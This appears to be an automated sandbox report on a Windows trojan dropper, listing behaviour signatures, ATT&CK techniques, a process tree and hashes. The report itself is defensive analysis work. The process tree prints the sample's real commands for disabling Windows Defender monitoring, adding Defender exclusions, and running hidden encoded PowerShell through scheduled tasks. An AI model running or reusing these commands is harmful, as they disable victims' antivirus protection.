df6d5d22ec1f14d6fe4932adf11ef8940ec436bb0e46ff21bb342117de116818

Analysis

max time kernel
152s
max time network
144s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
18/10/2022, 15:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

da1bc38380286df3feea1fdca57ea038
SHA1

5956c406ba4c9b8c53541fe29e4e431355a099be
SHA256

df6d5d22ec1f14d6fe4932adf11ef8940ec436bb0e46ff21bb342117de116818
SHA512

87e162a70c855462905d636e230c07b9bdb1e75e768e3d6283f9c96be77cdee24e14f560b05c959e928fb4196bbc28fafa98868430ba722ebf7360401a414606
SSDEEP

196608:91ORcB5FC9b06B1MTKGo118U6ke2cH9sN4LcZVq/iTSOP2y95D:3OwK9b06BDGov798GZ4iPPf95D

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\BSCTWiFJDtUitSTE = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\BSCTWiFJDtUitSTE = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Executes dropped EXE 3 IoCs

pid	Process
1384	Install.exe
628	Install.exe
964	iRDzntZ.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
1248	file.exe
1384	Install.exe
1384	Install.exe
1384	Install.exe
1384	Install.exe
628	Install.exe
628	Install.exe
628	Install.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	iRDzntZ.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	iRDzntZ.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	iRDzntZ.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bxLHRKpEAJQThoYlam.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1008	schtasks.exe
1768	schtasks.exe
1572	schtasks.exe
1180	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
1828	powershell.EXE
1828	powershell.EXE
1828	powershell.EXE
1292	powershell.EXE
1292	powershell.EXE
1292	powershell.EXE
1560	powershell.EXE
1560	powershell.EXE
1560	powershell.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1828	powershell.EXE
Token: SeDebugPrivilege	1292	powershell.EXE
Token: SeDebugPrivilege	1560	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1248 wrote to memory of 1384	1248	file.exe	26
PID 1248 wrote to memory of 1384	1248	file.exe	26
PID 1248 wrote to memory of 1384	1248	file.exe	26
PID 1248 wrote to memory of 1384	1248	file.exe	26
PID 1248 wrote to memory of 1384	1248	file.exe	26
PID 1248 wrote to memory of 1384	1248	file.exe	26
PID 1248 wrote to memory of 1384	1248	file.exe	26
PID 1384 wrote to memory of 628	1384	Install.exe	27
PID 1384 wrote to memory of 628	1384	Install.exe	27
PID 1384 wrote to memory of 628	1384	Install.exe	27
PID 1384 wrote to memory of 628	1384	Install.exe	27
PID 1384 wrote to memory of 628	1384	Install.exe	27
PID 1384 wrote to memory of 628	1384	Install.exe	27
PID 1384 wrote to memory of 628	1384	Install.exe	27
PID 628 wrote to memory of 1388	628	Install.exe	29
PID 628 wrote to memory of 1388	628	Install.exe	29
PID 628 wrote to memory of 1388	628	Install.exe	29
PID 628 wrote to memory of 1388	628	Install.exe	29
PID 628 wrote to memory of 1388	628	Install.exe	29
PID 628 wrote to memory of 1388	628	Install.exe	29
PID 628 wrote to memory of 1388	628	Install.exe	29
PID 628 wrote to memory of 696	628	Install.exe	31
PID 628 wrote to memory of 696	628	Install.exe	31
PID 628 wrote to memory of 696	628	Install.exe	31
PID 628 wrote to memory of 696	628	Install.exe	31
PID 628 wrote to memory of 696	628	Install.exe	31
PID 628 wrote to memory of 696	628	Install.exe	31
PID 628 wrote to memory of 696	628	Install.exe	31
PID 1388 wrote to memory of 1520	1388	forfiles.exe	33
PID 1388 wrote to memory of 1520	1388	forfiles.exe	33
PID 1388 wrote to memory of 1520	1388	forfiles.exe	33
PID 1388 wrote to memory of 1520	1388	forfiles.exe	33
PID 1388 wrote to memory of 1520	1388	forfiles.exe	33
PID 1388 wrote to memory of 1520	1388	forfiles.exe	33
PID 1388 wrote to memory of 1520	1388	forfiles.exe	33
PID 696 wrote to memory of 1780	696	forfiles.exe	34
PID 696 wrote to memory of 1780	696	forfiles.exe	34
PID 696 wrote to memory of 1780	696	forfiles.exe	34
PID 696 wrote to memory of 1780	696	forfiles.exe	34
PID 696 wrote to memory of 1780	696	forfiles.exe	34
PID 696 wrote to memory of 1780	696	forfiles.exe	34
PID 696 wrote to memory of 1780	696	forfiles.exe	34
PID 1780 wrote to memory of 400	1780	cmd.exe	36
PID 1780 wrote to memory of 400	1780	cmd.exe	36
PID 1780 wrote to memory of 400	1780	cmd.exe	36
PID 1780 wrote to memory of 400	1780	cmd.exe	36
PID 1780 wrote to memory of 400	1780	cmd.exe	36
PID 1780 wrote to memory of 400	1780	cmd.exe	36
PID 1780 wrote to memory of 400	1780	cmd.exe	36
PID 1520 wrote to memory of 1772	1520	cmd.exe	35
PID 1520 wrote to memory of 1772	1520	cmd.exe	35
PID 1520 wrote to memory of 1772	1520	cmd.exe	35
PID 1520 wrote to memory of 1772	1520	cmd.exe	35
PID 1520 wrote to memory of 1772	1520	cmd.exe	35
PID 1520 wrote to memory of 1772	1520	cmd.exe	35
PID 1520 wrote to memory of 1772	1520	cmd.exe	35
PID 1780 wrote to memory of 1476	1780	cmd.exe	37
PID 1520 wrote to memory of 1572	1520	cmd.exe	38
PID 1520 wrote to memory of 1572	1520	cmd.exe	38
PID 1520 wrote to memory of 1572	1520	cmd.exe	38
PID 1780 wrote to memory of 1476	1780	cmd.exe	37
PID 1780 wrote to memory of 1476	1780	cmd.exe	37
PID 1520 wrote to memory of 1572	1520	cmd.exe	38
PID 1520 wrote to memory of 1572	1520	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1248
- C:\Users\Admin\AppData\Local\Temp\7zS6143.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1384
- - C:\Users\Admin\AppData\Local\Temp\7zS6C6A.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:628
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1388
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1520
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:1772
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1572
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:696
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1780
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:400
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:1476
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gnIdsCfgV" /SC once /ST 02:53:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1008
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gnIdsCfgV"
      4⤵
      PID:1432
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gnIdsCfgV"
      4⤵
      PID:1976
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bxLHRKpEAJQThoYlam" /SC once /ST 17:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\iRDzntZ.exe\" Xi /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:1768

C:\Windows\system32\taskeng.exe
taskeng.exe {140586B7-9E02-436B-B39B-07050E09A6D2} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]
1⤵
PID:1436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1828
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1292
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1560
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1176

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1740

C:\Windows\system32\taskeng.exe
taskeng.exe {10755D13-5A45-40FA-BE5F-0549598F5332} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:800
- C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\iRDzntZ.exe
  C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\iRDzntZ.exe Xi /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:964
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ghdGXRaKd" /SC once /ST 13:34:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1572
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ghdGXRaKd"
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ghdGXRaKd"
    3⤵
    PID:704
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:880
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1488
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:844
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1636
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gEAlrErCZ" /SC once /ST 15:12:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1180
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gEAlrErCZ"
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gEAlrErCZ"
    3⤵
    PID:520
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1628
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:1416
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1332
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:2000
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1640
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1952
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:540
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\BSCTWiFJDtUitSTE" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:796
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\BSCTWiFJDtUitSTE\UDxqqnDG\LPLrJXxmpygcloje.wsf"
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\BSCTWiFJDtUitSTE\UDxqqnDG\LPLrJXxmpygcloje.wsf"
    3⤵
    PID:1124

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1652

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1276

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS6143.tmp\Install.exe

Filesize
6.3MB

MD5
82a5c0315f25dcc50db6b5c6cfd719b9

SHA1
be08406d495a7d51a0fae4527b5ab3dad0fab8e2

SHA256
211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a

SHA512
d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6143.tmp\Install.exe

Filesize
6.3MB

MD5
82a5c0315f25dcc50db6b5c6cfd719b9

SHA1
be08406d495a7d51a0fae4527b5ab3dad0fab8e2

SHA256
211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a

SHA512
d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6C6A.tmp\Install.exe

Filesize
6.8MB

MD5
5d6141af60cd8b24b8b290bf6636587b

SHA1
48eb68439991352862705c712e78bec9e9c22cc0

SHA256
a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e

SHA512
a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS6C6A.tmp\Install.exe

Filesize
6.8MB

MD5
5d6141af60cd8b24b8b290bf6636587b

SHA1
48eb68439991352862705c712e78bec9e9c22cc0

SHA256
a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e

SHA512
a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\iRDzntZ.exe

Filesize
6.8MB

MD5
5d6141af60cd8b24b8b290bf6636587b

SHA1
48eb68439991352862705c712e78bec9e9c22cc0

SHA256
a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e

SHA512
a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZyeNxPewqdvWdSGVD\XAeXowEXsoYxLgU\iRDzntZ.exe

Filesize
6.8MB

MD5
5d6141af60cd8b24b8b290bf6636587b

SHA1
48eb68439991352862705c712e78bec9e9c22cc0

SHA256
a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e

SHA512
a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
eb7a824d4c615559aa450089e298349e

SHA1
2ac227bd989eb95d2e2e1b9b387d31f48889ecd3

SHA256
421627c8ba9aed96d9e34ce407a4a09e877c0b4d7d72b1c551197f614ca4a878

SHA512
baaa66d8354265545b638a8236a8ef61e818de257f6f25fb2f53d27c4c313f0b9ef78f0946dfbd1fbe6cc3c7336bcd773c1c474dbaa656262411266cdd07c67f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c10555c1d0f786ffa5ff2e5a88b37310

SHA1
266a54fee309a6b5d435808dcf43758825fc6686

SHA256
54cf69c958619ff0a4b208e70df8701e8147e1eaf4978f1856a59d2df8fc9a86

SHA512
ab307a6ccb870689ee6775748f84739617c63d66a89dd4b66db8e8ffbe3dbb62c36ef38db148cf368fec314df74eddd26f7fada74f532da07330178c9582ffc8

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini

Filesize
268B

MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\Users\Admin\AppData\Local\Temp\7zS6143.tmp\Install.exe

Filesize
6.3MB

MD5
82a5c0315f25dcc50db6b5c6cfd719b9

SHA1
be08406d495a7d51a0fae4527b5ab3dad0fab8e2

SHA256
211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a

SHA512
d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef

Download Submit
\Users\Admin\AppData\Local\Temp\7zS6143.tmp\Install.exe

Filesize
6.3MB

MD5
82a5c0315f25dcc50db6b5c6cfd719b9

SHA1
be08406d495a7d51a0fae4527b5ab3dad0fab8e2

SHA256
211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a

SHA512
d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef

Download Submit
\Users\Admin\AppData\Local\Temp\7zS6143.tmp\Install.exe

Filesize
6.3MB

MD5
82a5c0315f25dcc50db6b5c6cfd719b9

SHA1
be08406d495a7d51a0fae4527b5ab3dad0fab8e2

SHA256
211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a

SHA512
d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef

Download Submit
\Users\Admin\AppData\Local\Temp\7zS6143.tmp\Install.exe

Filesize
6.3MB

MD5
82a5c0315f25dcc50db6b5c6cfd719b9

SHA1
be08406d495a7d51a0fae4527b5ab3dad0fab8e2

SHA256
211e76fda575ba172a87a4f9afc4ac753f7a7918f4a779efe0144e6fd961a94a

SHA512
d144dbd69bdf7a576b37dc49a9229769865b70802748103a686a53194ce86cfd67a5576fcf562eb2679e3fc8d64ef7d2efccc500123c420efb7c298ea12e95ef

Download Submit
\Users\Admin\AppData\Local\Temp\7zS6C6A.tmp\Install.exe

Filesize
6.8MB

MD5
5d6141af60cd8b24b8b290bf6636587b

SHA1
48eb68439991352862705c712e78bec9e9c22cc0

SHA256
a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e

SHA512
a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7

Download Submit
\Users\Admin\AppData\Local\Temp\7zS6C6A.tmp\Install.exe

Filesize
6.8MB

MD5
5d6141af60cd8b24b8b290bf6636587b

SHA1
48eb68439991352862705c712e78bec9e9c22cc0

SHA256
a5ac7106c60fa66dc451e4c01f65e4c40717420c92f6196941faba9ff5f4528e

SHA512
a4de36a9f2afdbefd20352bb0d848066ed73b0d4581730b1dae9025c039d014b412b86d3c05654e2c70a01dd2ab6a5294464e00a87340c1d1367dc63fd89e0f7

Download Submit
\Users\Admin\AppData\Local\Temp\7zS6C6A.tmp\Install.exe

